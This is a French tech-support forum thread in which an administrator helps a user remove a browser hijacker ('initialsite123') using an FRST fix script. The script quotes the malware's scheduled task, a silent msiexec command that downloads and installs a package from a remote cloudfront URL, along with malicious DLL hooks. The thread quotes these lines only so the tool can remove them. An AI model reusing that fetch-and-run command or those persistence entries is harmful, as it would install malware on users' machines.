Virus initialsite123

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

cam
Messages : 1
Inscription : 06 mai 2017 22:51

Virus initialsite123

Message par cam » 07 mai 2017 14:08

Bonjour, j'ai chopé un petit virus qui remplace google chrome par un moteur de recherche qui se nomme initialsite123. J'ai suivi le tuto et voila les 3 liens :
http://pjjoint.malekal.com/files.php?id ... z6p13r5u15
http://pjjoint.malekal.com/files.php?id ... x10p11p9i7
http://pjjoint.malekal.com/files.php?id ... 15w11m6n13

Cordialement, merci.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 84995
Inscription : 10 sept. 2005 13:57
Contact :

Re: Virus initialsite123

Message par Malekal_morte » 07 mai 2017 14:18

Hello,

Vas dans le Panneau de Configuration
puis programmes et fonctionnalités
(voir : Comment Désinstaller les programmes sur Windows).
Désinstalle :
Browser Configuration Utility
Intel Security True Key
Java
McAfee Security Scan Plus
WiperSoft

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
Task: {26BD16D8-F95F-4A1C-BDC7-4ABA70D5C597} - System32\Tasks\Chinery => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST3750528AS_5VP2T96SXXXX5VP2T96S&amp;d=20170506 /q <==== ATTENTION
Task: {305C3BD6-4CEF-4A70-A3DA-89672DB660D8} - System32\Tasks\WiperSoft Startup => C:\Program Files\WiperSoft\WiperSoft.exe [2017-05-06] (WiperSoft)
 ShellExecuteHooks: Pas de nom - {A1421800-307C-11E7-B7C0-64006A5CFC23} - C:\Users\Monique\AppData\Roaming\Thurationdofupy\Drerkeringpopoly.dll [132608 2017-05-06] () 
HKLM\...\Providers\eti8xste: C:\Program Files\Ckilient Configuration\local32spl.dll [285184 2017-05-06] ()  
HKLM\...\Run: [InstallerLauncher] => C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe /run:C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-41 (l'élément de données a 36 caractères en plus). 
2017-05-06 20:56 - 2017-05-06 22:01 - 00015506 _____ C:\Users\Monique\Desktop\ZHPCleaner.txt  
 2017-05-06 20:46 - 2017-05-06 22:01 - 00000000 ____D C:\Users\Monique\AppData\Roaming\ZHP  
 2017-05-06 20:46 - 2017-05-06 20:46 - 02744320 _____ C:\Users\Monique\Downloads\ZHPCleaner.exe  
 2017-05-06 20:46 - 2017-05-06 20:46 - 00000841 _____ C:\Users\Monique\Desktop\ZHPCleaner.lnk  
 2017-05-06 20:42 - 2017-05-06 20:42 - 00019960 _____ (Wiper Software) C:\Windows\system32\wiperrm.exe  
 2017-05-06 20:42 - 2017-05-06 20:42 - 00000931 _____ C:\Users\Monique\Desktop\WiperSoft.lnk  
 2017-05-06 20:42 - 2017-05-06 20:42 - 00000000 ____D C:\Users\Monique\AppData\Roaming\WiperSoft 
 2017-05-06 20:42 - 2017-05-06 20:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WiperSoft 
 2017-05-06 20:41 - 2017-05-06 20:42 - 00000000 ____D C:\Program Files\WiperSoft 
 2017-05-06 20:41 - 2017-05-06 20:41 - 01979944 _____ (WiperSoft) C:\Users\Monique\Downloads\WiperSoft-installer.exe  
 2017-05-06 20:27 - 2017-05-06 22:17 - 00000000 ____D C:\Users\Monique\AppData\Local\Stvirpach 
 2017-05-06 20:27 - 2017-05-06 20:35 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic 
 2017-05-06 20:27 - 2017-05-06 20:27 - 00000000 ____D C:\Users\Monique\AppData\Roaming\Thurationdofupy 
 2017-05-06 20:27 - 2017-05-06 20:27 - 00000000 ____D C:\Program Files\Shhekserother 
 2017-05-06 20:27 - 2017-05-06 20:27 - 00000000 ____D C:\Program Files\Ckilient Configuration 
 2017-05-06 20:25 - 2017-05-06 20:26 - 04942556 _____ C:\Users\Monique\Downloads\Outlast_2_Crack_OnlyCODEX.zip 
 2017-05-06 20:25 - 2017-05-06 20:25 - 00000985 _____ C:\Users\Monique\Downloads\Outlast_2_Crack_OnlyCODEX (1).htm 
 2017-05-06 19:58 - 2017-05-06 20:01 - 3503771404 _____ C:\Users\Monique\Downloads\OUTLAST 2.rar 
 2017-05-06 19:13 - 2017-05-06 19:13 - 00000986 _____ C:\Users\Monique\Downloads\Outlast_2_Crack_OnlyCODEX.htm 
 2017-05-06 18:49 - 2017-05-06 18:49 - 07128576 _____ C:\Users\Monique\Downloads\Outlast - InstallShield Wizard (1).exe 
 2017-05-06 18:32 - 2017-05-06 18:32 - 07128576 _____ C:\Users\Monique\Downloads\Outlast - InstallShield Wizard.exe 
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concerné(s) par les problèmes :
* réparer Mozilla Firefox (premier paragraphe)
* réparer Google Chrome (premier paragraphe)
* Réinitialiser et réparer Internet Explorer

3°)

Fais un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités